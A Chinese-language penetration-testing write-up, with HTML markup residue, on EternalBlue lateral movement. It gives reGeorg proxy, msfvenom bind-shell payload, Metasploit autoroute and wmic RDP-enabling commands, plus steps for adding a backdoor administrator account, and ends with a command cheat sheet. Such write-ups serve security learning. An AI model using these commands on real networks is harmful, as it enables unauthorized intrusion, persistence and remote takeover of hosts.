内网渗透测试实战：利用永恒之蓝漏洞进行横向移动<\/h1>

1. 环境准备与初始访问<\/h2>

代理工具配置<\/strong>：<\/p>

使用reGeorg建立Socks代理通道<\/li>
命令：python2 reGeorgSocksProxy.py -p 12321 -u http:\/\/xxxxxx:9090\/exp\/exp.jsp<\/code><\/li> <\/ul> <\/li>
Metasploit框架准备<\/strong>：<\/p> 启动msfconsole<\/li> 搜索并选择ms17_010漏洞利用模块<\/li> <\/ul> <\/li> <\/ol> 2. 内网扫描与目标识别<\/h2> 扫描内网主机<\/strong>：<\/p> 使用msf进行内网扫描，发现多台存在永恒之蓝漏洞的主机<\/li> 扫描结果显示约40%的扫描进度就发现了十几台易受攻击主机<\/li> <\/ul> <\/li> 目标选择策略<\/strong>：<\/p> 随机测试多台主机均未成功<\/li> 发现代理不稳定可能导致利用失败<\/li> <\/ul> <\/li> <\/ol> 3. 攻击策略调整<\/h2> Payload选择<\/strong>：<\/p> 使用正向连接payload：windows\/x64\/meterpreter\/bind_tcp<\/code><\/li> 生成payload命令：msfvenom -p windows\/x64\/meterpreter\/bind_tcp LPORT=4443 -f exe > ev.exe<\/code><\/li> <\/ul> <\/li> 会话建立<\/strong>：<\/p> 上传并执行生成的木马<\/li> 使用msf连接目标：use exploit\/multi\/handler<\/code> + 设置相应参数<\/li> <\/ul> <\/li> 网络拓扑发现<\/strong>：<\/p> 执行ifconfig<\/code>和run get_local_subnets<\/code>发现多个网段<\/li> 添加路由：run autoroute -s 192.168.1.0\/24<\/code><\/li> <\/ul> <\/li> <\/ol> 4. 漏洞利用技巧<\/h2> 常见问题解决<\/strong>：<\/p> 反弹shell失败可能原因：缺少到Kali的路由<\/li> 存在防护设备<\/li> <\/ul> <\/li> 解决方案：修改payload执行参数<\/li> <\/ul> <\/li> 权限提升与持久化<\/strong>：<\/p> 添加管理员账号<\/li> 将账号加入管理员组<\/li> 开启远程桌面服务： wmic path win32_terminalservicesetting where (__CLASS != "") call setallowtsconnections 1 <\/code><\/pre> <\/li> <\/ul> <\/li> <\/ol> 5. 目标筛选与最终利用<\/h2> 目标筛选策略<\/strong>：<\/p> 扫描开放3389端口的主机<\/li> 与存在永恒之蓝漏洞的主机取交集<\/li> 确定最终目标：192.168.1.144<\/li> <\/ul> <\/li> 成功利用<\/strong>：<\/p> 重复执行前述攻击步骤<\/li> 成功建立远程桌面连接<\/li> <\/ul> <\/li> <\/ol> 6. 经验总结与问题记录<\/h2> 常见挑战<\/strong>：<\/p> 正向代理连接不稳定<\/li> 有永恒之蓝漏洞的主机可能未开启3389<\/li> 开启3389后可能出现"内部错误"<\/li> <\/ul> <\/li> 解决思路<\/strong>：<\/p> 重新梳理目标，进行精确扫描<\/li> 寻找漏洞与开放端口的交集主机<\/li> 多次尝试不同payload和参数<\/li> <\/ul> <\/li> 后续方向<\/strong>：<\/p> 向域控目标推进<\/li> 考虑其他横向移动技术<\/li> <\/ul> <\/li> <\/ol> 附录：关键命令速查<\/h2> # 代理建立<\/span> <\/span><\/span>python2 reGeorgSocksProxy.py -p [<\/span>LOCAL_PORT]<\/span> -u [<\/span>TUNNEL_URL]<\/span> <\/span><\/span> <\/span><\/span># Payload生成<\/span> <\/span><\/span>msfvenom -p windows\/x64\/meterpreter\/bind_tcp LPORT=[<\/span>PORT]<\/span> -f exe > output.exe <\/span><\/span> <\/span><\/span># 路由添加<\/span> <\/span><\/span>run autoroute -s [<\/span>SUBNET]<\/span> <\/span><\/span> <\/span><\/span># 开启远程桌面<\/span> <\/span><\/span>wmic path win32_terminalservicesetting where (<\/span>__CLASS !=<\/span> ""<\/span>)<\/span> call setallowtsconnections 1<\/span> <\/span><\/span><\/code><\/pre>注意：实际渗透测试必须获得合法授权，本文仅用于学习目的。<\/p>